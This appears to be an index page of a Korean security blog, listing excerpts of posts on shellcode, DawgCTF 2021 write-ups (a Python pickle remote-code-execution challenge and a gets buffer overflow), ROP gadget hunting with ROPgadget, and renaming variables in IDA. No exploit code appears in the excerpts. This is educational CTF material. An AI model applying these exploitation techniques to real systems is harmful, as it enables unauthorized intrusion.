[PWN] shellcode ์ •๋ฆฌ ํฌ์ŠคํŒ… ์ธ๋„ค์ผ ์ด๋ฏธ์ง€

SYSTEM HACKING/PWNABLE

[PWN] shellcode ์ •๋ฆฌ

๋ณธ ๊ธ€์€ Dreamhack System Hacking Curriculum - Shellcode๋ฅผ ์ฐธ๊ณ ํ•˜์—ฌ ์ž‘์„ฑ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. 1. ๊ฐœ์š” ๊ธฐ๋ณธ์ ์œผ๋กœ ์‹œ์Šคํ…œ ํ•ดํ‚น์˜ ๋ชฉ์ ์€ ๋Œ€์ƒ ์‹œ์Šคํ…œ์„ '๋ถ€๋‹นํ•˜๊ฒŒ ์ด์šฉ'ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. administrator์˜ ๊ถŒํ•œ์„ ๋นผ์•˜๋Š” ๊ฒƒ๋ถ€ํ„ฐ ์‹œ์ž‘ํ•ด์„œ ์ธ๊ฐ€๋˜์ง€ ์•Š์€ ํŒŒ์ผ์„ ์—ด์–ด๋ณด๋Š” ๊ฒƒ ๋“ฑ๋“ฑ๋„ ํ•ดํ‚น์˜ ๋ชฉ์ ์ด ๋  ์ˆ˜ ์žˆ๊ฒ ์ฃ . ์ด๋ฅผ ์œ„ํ•ด ์ œ์ž‘๋œ ์–ด์…ˆ๋ธ”๋ฆฌ์–ด ์ฝ”๋“œ๋ฅผ ์‰˜์ฝ”๋“œ(shellcode)๋ผ๊ณ  ํ•ฉ๋‹ˆ๋‹ค. ํ•ด๋‹น ์ฝ”๋“œ๋ฅผ ์‹คํ–‰์‹œํ‚ค๋ฉด ์‰˜(shell)์„ ์‹คํ–‰์‹œํ‚ฌ ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค. ๊ตณ์ด C์–ธ์–ด์™€ ๊ฐ™์€ ๊ณ ๋“ฑ ์–ธ์–ด๊ฐ€ ์•„๋‹Œ ์–ด์…ˆ๋ธ”๋ฆฌ์–ด๋กœ ์ž‘์„ฑํ•˜๋Š” ์ด์œ ๋Š”, ์–ด์…ˆ๋ธ”๋ฆฌ์–ด ๋‹จ์œผ๋กœ ์ž‘์„ฑํ•  ๊ฒฝ์šฐ RIP๋ ˆ์ง€์Šคํ„ฐ๋งŒ ์กฐ์ •ํ•  ์ˆ˜ ์žˆ์–ด๋„ ๋ฐ”๋กœ ์›ํ•˜๋Š” ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค. ๋ฌผ๋ก  ์–ด์…ˆ๋ธ”๋ฆฌ์–ด๋กœ ์ž‘์„ฑ๋œ๋‹ค๋Š” ํŠน์„ฑ์ƒ ์•„ํ‚คํ…์ณ ..

2022.04.06 ๊ฒŒ์‹œ๋จ

[DawgCTF 2021] :pwn: Jellyspotters Write-Up ํฌ์ŠคํŒ… ์ธ๋„ค์ผ ์ด๋ฏธ์ง€

CTF

[DawgCTF 2021] :pwn: Jellyspotters Write-Up

Jellyspotters - 100pts Description Tag pwnable, pickle, python Problem Analysis ๊ทธ๋ฆผ์„ ๊ทธ๋ฆฌ๋Š” ํ”„๋กœ๊ทธ๋žจ์ด๋„ค์šฉ ๋Œ€์ถฉ ์ด๋Ÿฐ ํ”„๋กœ๊ทธ๋žจ์ด๊ณ  ์ด๊ฒƒ์ €๊ฒƒ ํ•ด๋ดค๋Š”๋ฐ Pickle์„ ์‚ฌ์šฉํ•œ๋‹ค๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๊ตฐ์š” Pickle์€ ์ทจ์•ฝ์ ์ด ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค. ๊ธ€ ์ฒจ๋ถ€ํ•ฉ๋‹ˆ๋‹ค. https://davidhamann.de/2020/04/05/exploiting-python-pickle/ Exploiting Python pickles How unpickling untrusted data can lead to remote code execution. davidhamann.de ๊ทธ๋Ÿผ ์ด๊ฑธ ๊ฐ€์ง€๊ณ  RCE๋ฅผ ํ•ด๋ด…์‹œ๋‹น Exploit ์ž ๊ธฐ๋ณธ์ ์œผ๋กœ pickle์˜ ์ทจ์•ฝ์ ์€ __reduce__..

2021.05.18 ๊ฒŒ์‹œ๋จ

[DawgCTF 2021] :pwn: Bofit Write-Up ํฌ์ŠคํŒ… ์ธ๋„ค์ผ ์ด๋ฏธ์ง€

CTF

[DawgCTF 2021] :pwn: Bofit Write-Up

Bofit - 125pts Description Tag pwnable, BOF Problem Analysis ์•„๋งˆ ์ œ์ผ ์‰ฌ์šด ๋ฌธ์ œ๊ฐ€ ์•„๋‹ˆ์˜€์„๊นŒ ์‹ถ์–ด์šฉ ๋ด…์‹œ๋‹น ์žฅ๋‚œ๊ฐ BOP-IT์„ ์˜ค๋งˆ์ฃผํ•œ ๊ฒƒ ๊ฐ™๋„ค์šฉ 3๋ฒˆ ์ผ€์ด์Šค์ธ Shout it!์„ ๋ณด๋ฉด ์•„์˜ˆ gets๋กœ ์ž…๋ ฅ์„ ๋ฐ›๋Š” ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๊ฑธ ๊ฐ€์ง€๊ณ  ๋ฐ”๋กœ BOF๋ฅผ ์ง„ํ–‰ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. ๋ณ„๋‹ค๋ฅธ ์ž‘์—…ํ•  ๊ฒƒ ์—†์ด ๊ทธ๋ƒฅ ํ•˜๋ฉด ๋˜๊ฒ ๋„ค์œ  ๊ตณ๊ตณ

2021.05.14 ๊ฒŒ์‹œ๋จ

[ROP] gadget์ฐพ๋Š”๋ฒ• ํฌ์ŠคํŒ… ์ธ๋„ค์ผ ์ด๋ฏธ์ง€

SYSTEM HACKING/PWNABLE

[ROP] gadget์ฐพ๋Š”๋ฒ•

ROP(Return Oriented Programming)์—์„œ ๊ฐ€์žฅ ํ•ต์‹ฌ์ ์ธ ๋ถ€๋ถ„์„ ๊ณ ๋ฅด๋ผ๊ณ  ํ•˜๋ฉด gadget์„ ๊ตฌํ•˜๋Š” ๊ฒƒ์ผ ๊ฒƒ์ด๋‹ค. ์ด์—๋Š” ๋ช‡๊ฐ€์ง€ ๋ฐฉ๋ฒ•์ด ์žˆ๋‹ค. 1. ROPgadget ์ด์šฉํ•˜๊ธฐ ๋ช…๋ น์–ด๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์“ฐ๋ฉด ๋ฉ๋‹ˆ๋‹น. ROPgadget --binary (ํŒŒ์ผ๋ช…) | grep '(์ฐพ์„ ๊ฐ€์ ฏ)' ์ง . ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์‚ฌ์šฉํ•˜๋ฉด ๋œ๋‹ค. ์œ„์˜ ๊ฒฝ์šฐ๋Š” 64๋น„ํŠธ์˜ ๊ฒฝ์šฐ๊ณ  32๋น„ํŠธ๋„ ๊ทธ๋ƒฅ ๋˜‘๊ฐ™๋‹ค. (์ฐธ๊ณ ๋กœ 64๋น„ํŠธ์—์„œ ์ธ์ž ๋ฐ›๋Š” ์ˆœ์„œ๋Š” rdi, rsi, rdx ์ˆœ์„œ๋ผ๊ณ  ํ•œ๋‹ค ์™ธ์šฐ์žฅ) ๊ทผ๋ฐ ์ €๊ธฐ ์„ธ ๋ฒˆ์งธ์˜ ๊ฒฝ์šฐ๋ฅผ ๋ณด๋ฉด ์•„๋ฌด๋Ÿฐ ๊ฒฐ๊ณผ๊ฐ€ ์—†๋‹ค. ๊ทธ๋Ÿผ ๊ฒฝ์šฐ๋Š” ๋‘๊ฐ€์ง€์ด๋‹ค. 1. ์ง„์งœ๋กœ pop rdx๊ฐ€ ์—†๋‹ค. 2. ROPgadget ์œผ๋กœ๋Š” ์กฐํšŒ๊ฐ€ ๋˜์ง€ ์•Š๋Š”๋‹ค. ๊ทผ๋ฐ ์ด๊ฒฝ์šฐ๋Š” ํ”„๋กœ๊ทธ๋žจ์— pop rdx๊ฐ€ ์—†์„๋ฆฌ๊ฐ€ ์—†๊ธฐ๋•Œ๋ฌธ์— ..

2019.10.11 ๊ฒŒ์‹œ๋จ

[IDA] 01. ๋ณ€์ˆ˜์˜ ์ด๋ฆ„ ๋ฐ”๊พธ๊ธฐ ํฌ์ŠคํŒ… ์ธ๋„ค์ผ ์ด๋ฏธ์ง€

Tips

[IDA] 01. ๋ณ€์ˆ˜์˜ ์ด๋ฆ„ ๋ฐ”๊พธ๊ธฐ

[IDA] 01. ๋ณ€์ˆ˜ ์ด๋ฆ„ ๋ฐ”๊พธ๊ธฐ ๋„ˆ๋ฌด ๊ฐ„๋‹จํ•œ ๋‚ด์šฉ์ด์—ฌ์„œ ์–ผ๋ฅธ ๋๋‚ด์ฃ . ๋‹ค์Œ์€ ASIS CTF 4๊ฐ•์ „ ๋ฌธ์ œ ์ค‘ ํ•˜๋‚˜์ธ Cat์„ IDA๋กœ ๋Œ๋ฆฐ ๊ฒƒ์ž…๋‹ˆ๋‹ค. ๋ณด๋ฉด c์–ธ์–ด ํŒŒ์ผ๋กœ ์ž‘์„ฑ๋˜์–ด์žˆ์ง€๋งŒ, ์‚ฌ์šฉ์ž ์„ค์ • ๋ณ€์ˆ˜๋‚˜ ํ•จ์ˆ˜์˜ ์ด๋ฆ„๋“ค์€ sub_๋‚˜ ์šฐ๋ฆฌ๊ฐ€ ํ”ํžˆ ์ด์šฉํ•˜์ง€ ์•Š๋Š” ์ด๋ฆ„๋“ค๋กœ ๋˜์–ด์žˆ๋Š” ๊ฑธ ๋ณผ ์ˆ˜ ์žˆ์ฃ  ๋„ค ๋ฐ”๊พธ๊ณ  ์‹ถ์€ ๋ณ€์ˆ˜ ์œ„์— ๋งˆ์šฐ์Šค๋ฅผ ์˜ฌ๋ ค๋†“๊ณ  ์˜ค๋ฅธ์ชฝ ํด๋ฆญ ํ›„, ์ €๊ธฐ ์ฒซ๋ฒˆ์งธ Rename global item์„ ํด๋ฆญํ•˜๊ฑฐ๋‚˜ N์„ ๋ˆ„๋ฅด๋ฉด ์ด ์ฐฝ์ด ๋œจ๋Š”๋ฐ ์—ฌ๊ธฐ์„œ ๋ฐ”๊ฟ”์ฃผ์‹œ๋ฉด ๋ฉ๋‹ˆ๋‹ค. ์ฐธ๊ณ ๋กœ ์ด๋ฆ„์ง“๋Š” ๋ฐฉ๋ฒ•์€ C์–ธ์–ด์—์„œ ๋ณ€์ˆ˜์ด๋ฆ„์ง€์ • ๊ทœ์น™๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค(๋นˆ์นธ์•ˆ๋˜๊ณ , ํŠน์ˆ˜๋ฌธ์ž ์•ˆ๋˜๊ณ  ๋“ฑ๋“ฑ..) ๋!

2019.08.10 ๊ฒŒ์‹œ๋จ